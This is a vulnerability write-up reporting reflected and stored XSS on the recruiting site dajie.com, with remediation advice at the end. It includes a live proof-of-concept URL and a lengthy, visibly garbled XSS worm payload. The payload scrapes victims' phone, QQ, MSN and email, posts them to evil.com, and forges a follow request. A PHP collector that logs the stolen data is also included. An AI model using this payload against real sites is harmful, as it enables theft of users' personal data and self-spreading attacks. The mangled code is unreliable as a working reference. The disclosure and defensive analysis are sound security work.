Over the past few months I used Dajie (dajie.com) to look for an internship; it is currently the most prominent site for corporate campus recruiting. A quick test turned up both stored and reflected XSS. Reflected proof of concept (the payload shape — a closing `');` followed by `//` — indicates that the `KeyWords` parameter is echoed, unencoded, inside a single-quoted JavaScript string argument; the injected text closes the string and the call, runs `alert(document.cookie)`, and comments out the remainder of the line): http://www.dajie.com/card/exchange/index?KeyWords=1234');alert(document.cookie);//
The parameter is reflected with no filtering or output encoding at all. In addition, the résumé and business-card fields are stored XSS sinks: markup saved there is executed whenever the profile or card is viewed by another user.
Then visit the personal homepage: through these XSS points, it is easier to collect the Resume Information of some undisclosed users. I wrote a simple XSS Payload, which can collect user contact information and send it to a remote device. The client automatically follows me and uses cookies to avoid secondary pollution. When several functions are in the same domain, the function of automatically Sending Short Messages becomes a simple worm, only sending the Payload part, and using the newer DOM method getElementsByClassName, which is initially related to XSS, hello. XSS Payload: /* Attacker-authored XSS payload, reproduced here for analysis only. Flow, as the code below shows: read the victim's user id from the "uchome_loginuser" cookie; fetch the victim's own profile page (cus_url) over a same-origin XHR; scrape phone/QQ/MSN/email out of the returned HTML; POST them to an attacker host (http://www.evil.com/xsstest.php) via an auto-submitted form; fire a GET to the "invite" API so the victim follows the attacker; finally drop an "xssed" marker cookie so the script does not run twice in the same browser. Defensive takeaways that follow directly from what the payload relies on: the id cookie is readable from document.cookie (so it is not HttpOnly); the follow action is a state-changing, cookie-authenticated GET with no visible anti-CSRF token; a cross-origin form POST is not stopped by the same-origin policy (a Content-Security-Policy form-action restriction would block it). This listing is an extraction-mangled one-liner: "& gt;" / "& amp;" are HTML-escaped ">" and "&&", single "=" in comparisons and "! =" are presumably "==" / "!=", a stray "</code>" tag survives, identifier case was altered (Document, C_userid, followme, "I" were presumably document, c_userid, FollowMe, "i"), and the original end-of-line "//" comments now swallow the rest of each collapsed line. Do not treat it as runnable. */ var c_name = "uchome_loginuser" // var c_userid = "" // user IDvar cus_url = "in the cookie Field" http://www.dajie.com/profile/ Mine "// personal information interface var tel =" "// record phone var email =" "// record email var qq =" "// record QQvar msn = ""// record MSN </code> /* getCookieValue(c_name): return the value of cookie c_name from document.cookie, or "" when absent. Side effects: also assigns the global c_userid, and uses c_start / c_end as implicit globals (never declared). Only works if the cookie is script-readable, i.e. lacks HttpOnly. */ function getCookieValue (c_name) {if (document. cookie. length & gt; 0) // return the Cookie specified field {c_start = document. cookie. indexOf (c_name + "=") if (c_start! =-1) {c_start = c_start + c_name.length + 1; c_end = document. cookie. indexOf (";", c_start) if (c_end =-1) c_end = document. cookie. lengthc_userid = unescape (document. cookie. substring (c_start, c_end) return c_userid} return ""} /* setCookieValue(c_name, value): write c_name=escape(value) on the current document with no path, expiry or flags (session cookie, default path). */ function setCookieValue (c_name, value) // Add the Cookie value {document. cookie = c_name + "=" + escape (value)} /* getUrl(url_addr): fire an asynchronous same-origin GET through the global ajaxGet (XMLHttpRequest, ActiveX fallback). It sets no response handler itself; the caller attaches onreadystatechange to ajaxGet afterwards. The victim's session cookies ride along automatically, which is what lets it read the private profile page. */ var ajaxGet = nullfunction getUrl (url_addr) {// request GET page content (same domain) through Ajax if (window. XMLHttpRequest) {ajaxGet = new XMLHttpRequest ();} else if (window. activeXObject) {ajaxGet = new ActiveXObject ("Microsoft. XMLHTTP ");} else {return" "} ajaxGet. open ("GET", url_addr, true) ajaxGet. setRequestHeader ("Content-Type", "text/xml") ajaxGet. send (null);} /* postUrl(post_url, cusKey, cusValue): asynchronous POST of "cusKey=cusValue" through the global ajaxPost. The Content-Type header line is commented out, and this helper is never called anywhere in the listing - the actual exfiltration goes through the form submit in the main block, presumably because a cross-origin XHR POST would be subject to CORS while a form navigation is not. */ var ajaxPost = nullfunction postUrl (post_url, cusKey, cusValue) // send a POST request to remote {var postStr = cusKey + "=" + cusValueif (window. XMLHttpRequest) {ajaxPost = new XMLHttpRequest ();} else if (window. 
activeXObject) {ajaxPost = new ActiveXObject ("Microsoft. XMLHTTP ");} else {return" "} ajaxPost. open ("POST", post_url, true) // ajax. setRequestHeader ("Content-Type", "application/x-www-form-urlencoded") ajaxPost. send (postStr)} /* getPersonalInfo(responContent): parse the fetched profile HTML by assigning it to a new div's innerHTML and appending that div to the live document, then read the "title" attribute of the first <i> inside the first element carrying each of the classes "tl-contact-item tel" / "qq" / "msn" / "email" into the globals tel, qq, msn, email. Assumes every one of those selectors matches ([0] is dereferenced unchecked). The scraped fields are plain-text contact data - nothing here depends on the victim's password or session token. */ function getPersonalInfo (responContent) // extract user personal information {var cusNode = document. createElement ("div") cusNode. innerHTML = responContentdocument. body. appendChild (cusNode) var preInfo = document. getElementsByClassName ("tl-contact-item tel") var realInfo = preInfo [0]. getElementsByTagName ("I") tel = realInfo [0]. getAttribute ("title") var preInfo = document. getElementsByClassName ("tl-contact-item qq") var realInfo = preInfo [0]. getElementsByTagName ("I") qq = realInfo [0]. getAttribute ("title") var preInfo = document. getElementsByClassName ("tl-contact-item msn") var realInfo = preInfo [0]. getElementsByTagName ("I") msn = realInfo [0]. getAttribute ("title") var preInfo = document. getElementsByClassName ("tl-contact-item email") var realInfo = preInfo [0]. getElementsByTagName ("I") email = realInfo [0]. getAttribute ("title")} /* Top-level: resolve the victim's id from the cookie and build the URL of their business card. icard_url is constructed but never used later in this listing. */ c_userid = getCookieValue (c_name) // obtain the user IDvar icard_url = "from the Cookie" http://www.dajie.com/profile/ "+ C_userid +"/icard "// construct the personal business card Url /* FollowMe(): forged follow/invite. Appending an <img> whose src is a GET to card/exchange/api/invite?cardUid=xxxxxx&ajax=1 (xxxxxx = the attacker's card id) makes the victim's browser perform the action with its own cookies. For the defender: a state change on a cookie-authenticated GET with no per-request token is forgeable from any origin via a plain <img>, so this is a CSRF defect independent of the XSS. */ function FollowMe () // automatically follow the specified user {var img = document. createElement ("img") img. src =" http://www.dajie.com/card/exchange/api/invite?cardUid=xxxxxx&ajax=1 "Document. body. appendChild (img)} /* Main block: skipped when the "xssed" marker cookie is already present. Otherwise request the profile page, and when it comes back with status 200: scrape the contact fields, build a form posting tel/email/qq/msn (each passed through escape()) to http://www.evil.com/xsstest.php, submit it (a cross-origin navigation the same-origin policy does not prevent), then call the follow routine. The marker cookie lives only in the victim's browser and is cleared along with any other cookie, so it limits noise for the attacker rather than protecting the victim. */ if (document. cookie. indexOf ("xssed") =-1) // judge whether the content has been contaminated {var content = "" getUrl (cus_url) // obtain the content of the page ajaxGet. onreadystatechange = function () {if (ajaxGet. readyState = 4 & amp; ajaxGet. status = 200) {content = ajaxGet. responseTextgetPersonalInfo (content) var cusForm = document. createElement ("div"); document. body. appendChild (cusForm) cusForm. 
innerHTML = '<form id = "xssform" action =" http://www.evil.com/xsstest.php "Method =" post "name =" mbform "> '+' <input type =" text "name =" tel "value =" + escape (tel) + "/> '+' <input type =" text "name =" email "value =" + escape (email) + "/> '+' <input type =" text "name =" qq "value =" + escape (qq) + "/> '+' <input type =" text "name =" msn "value =" + escape (msn) + "/> '+' </form> 'document. getElementById ("xssform "). submit () ;}}followme ()} /* Set the marker cookie unconditionally, outside the status check, so the payload is not re-run on later page loads even if the first attempt failed. */ setCookieValue ("xssed", true) // set the Cookie to avoid multiple cross-site contamination of remote reception information. /* Attacker-side collector (PHP, separate file): appends "Tel/QQ/MSN/Email" from $_POST to a file named after the requesting client's IP ($_SERVER['REMOTE_ADDR'].'.txt') in the script's own directory, then issues a Location redirect back to the HTTP Referer so the victim lands back on the originating page. Notes: $_POST[tel] etc. use unquoted constant indexes (a PHP notice); REMOTE_ADDR is set by the server, not the client, so the filename is not attacker-steerable, but the Location header echoes the client-supplied Referer unvalidated. */ php <? Php $ ip = $ _ SERVER ['remote _ ADDR ']; $ referer = $ _ SERVER ['HTTP _ referer']; $ agent =$ _ SERVER ['HTTP _ USER_AGENT ']; $ tel =$ _ POST [tel]; $ qq =$ _ POST [qq]; $ msn = $ _ POST [msn]; $ email = $ _ POST [email]; $ time = date ("Y-m-d G: I: s "); $ file = fopen($ip.'.txt ', 'A'); fwrite ($ file, "Tel :". $ tel. "\ nQQ :". $ qq. "\ nMSN :". $ msn. "\ nEmail :". $ email); fclose ($ file); header ("Location :". $ referer); //?>
Remediation (reporter: Daniel): contextually encode `KeyWords` and every stored résumé and business-card field on output — the reflected value above lands inside a JavaScript string, so it needs JavaScript-string escaping in addition to HTML entity encoding — or reject markup on input. Independently of the XSS, close the weaknesses the payload leans on: mark the `uchome_loginuser` cookie HttpOnly so script cannot read the user id; require a per-request anti-CSRF token and a non-GET method on `card/exchange/api/invite`; and consider a Content-Security-Policy whose `form-action` and `connect-src` are limited to the site's own origins so that injected script cannot ship harvested data off-site.